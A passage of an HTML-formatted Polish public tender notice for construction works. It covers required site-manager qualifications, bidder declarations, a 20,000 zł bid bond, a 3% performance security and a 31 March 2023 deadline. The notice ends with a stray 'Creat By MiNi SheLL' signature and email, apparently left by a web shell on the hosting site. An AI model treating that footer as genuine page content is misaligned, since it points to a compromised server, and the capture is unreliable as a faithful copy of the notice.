równoważne oraz<br/>3. jedną osobę pełniącą funkcję Kierownika robót i posiadającą odpowiednie uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych lub równoważne oraz<br/>4. jedną osobę pełniącą funkcję Kierownika robót i posiadającą odpowiednie uprawnienia budowlane do kierowania<br/>robotami budowlanymi w branży telekomunikacyjnej w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>telekomunikacyjnych lub równoważne.<br/>Zamawiający dopuszcza, aby jedna i ta sama osoba pełniła więcej niż jedną funkcję, o ile spełnia wymogi dla każdej funkcji.<br/>Zamawiający nie dopuszcza, aby jedna osoba pełniła wszystkie ww. funkcje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – według<br/>Załącznika nr 6 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>Wykaz posiadanych środków finansowych lub zdolności kredytowej w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem<br/>na kwotę minimum 1.000.000,00 zł (słownie: milion złotych).<br/>b) Wykaz wykonanych robót budowalnych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania i podmiotów,<br/>na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty zostały wykonane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; zgodnie z wzorem stanowiącym Załącznik nr 4 do SWZ.<br/>c) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego odpowiedzialnych za kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z Załącznikiem Nr 5 do SWZ – w odniesieniu do warunku określonego w rozdziale VI pkt. 2 podpunkt 4) lit. b SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu – zgodnie ze wzorem<br/>stanowiącym Załącznik nr 2 do SWZ;<br/>2) aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania – zgodnie ze wzorem<br/>stanowiącym Załącznik nr 3 do SWZ;<br/>3) zobowiązanie innego podmiotu do udostępnienia niezbędnych zasobów Wykonawcy – zgodnie ze wzorem stanowiącym<br/>Załącznik nr 7 do SWZ (jeżeli dotyczy);<br/>4) oświadczenie wymagane od Wykonawcy w zakresie wypełnienia obowiązków informacyjnych przewidzianych w art. 13<br/>lub art. 14 RODO – zgodnie ze wzorem stanowiącym<br/>Załącznik nr 9 do SWZ;<br/>5) oświadczenie podmiotu udostępniającego Wykonawcy zasoby dotyczące spełniania warunków udziału w postępowaniu<br/>oraz przesłanek wykluczenia z postępowania – zgodnie ze wzorem stanowiącym Załącznik nr 8 do SWZ (jeżeli dotyczy)<br/>6) dokumenty, z których wynika prawo do podpisania oferty, w tym pełnomocnictwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości 20.000,00 zł (słownie: dwadzieścia<br/>tysięcy złotych).<br/>2. Wadium wnosi się przed upływem terminu składania ofert. Wadium może być wnoszone w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:<br/>PEKAO S.A. oddział w Bytowie nr rachunku: 49 1240 3783 1111 0000 4080 8848 z adnotacją „Wadium dla postępowania<br/>RI.271.3.2023.NJ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Od Wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza wymagane będzie wniesienie, w określonym<br/>terminie, przed podpisaniem umowy zabezpieczenia należytego wykonania umowy w wysokości 3 % ceny całkowitej<br/>podanej w ofercie przedstawionej przez Wykonawcę.<br/>2. Zabezpieczenia należytego wykonania umowy wnoszone jest w jednej lub kilku następujących formach:<br/>1) w pieniądzu, przelewem na rachunek bankowy Zamawiającego: Pekao S.A. I ODDZIAŁ W BYTOWIE Nr 49 1240 3783<br/>1111 0000 4080 8848 z adnotacją „Zabezpieczenie należytego wykonania umowy postępowania nr RI.271.3.2023.NJ”. Za<br/>datę wniesienia zabezpieczenia uważa się datę wpływu środków na wskazany rachunek bankowy.<br/>2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej<br/>z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,<br/>3) w gwarancjach bankowych,<br/>4) w gwarancjach ubezpieczeniowych,<br/>5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość wprowadzenia zmian w Umowie, o których mowa w art. 455 ust. 1 pkt 1 ustawy Pzp,<br/>które mogą dotyczyć następujących przypadków:<br/>1) zmiana postanowień umowy w zakresie wysokości wynagrodzenia, zmiana, w tym wydłużenie, terminu wykonania przedmiotu umowy;<br/>zmiana technologii wykonania danego zakresu robót<br/>zmiana postanowień umowy co do zakresu świadczenia Wykonawcy;<br/>zmiany warunków realizacji Umowy niezbędne do prawidłowej realizacji zamówienia;<br/>zmiany o charakterze podmiotowym w zakresie Wykonawcy zamówienia.<br/>Szczegółowe warunki zostały opisane w rozdziale XXI SWZ oraz w załączniku nr 10 -wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie e-Zamowienia. Wykonawca przygotowuje ofertę przy pomocy interaktywnego „Formularza ofertowego” udostępnionego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”. 3. Instrukcja składania oferty na platformie e-zamowienia: https://ezamowienia.gov.pl/filmy/skladanie-przez-wykonawce%CC%A8-formularza-ofertowego/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-31 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com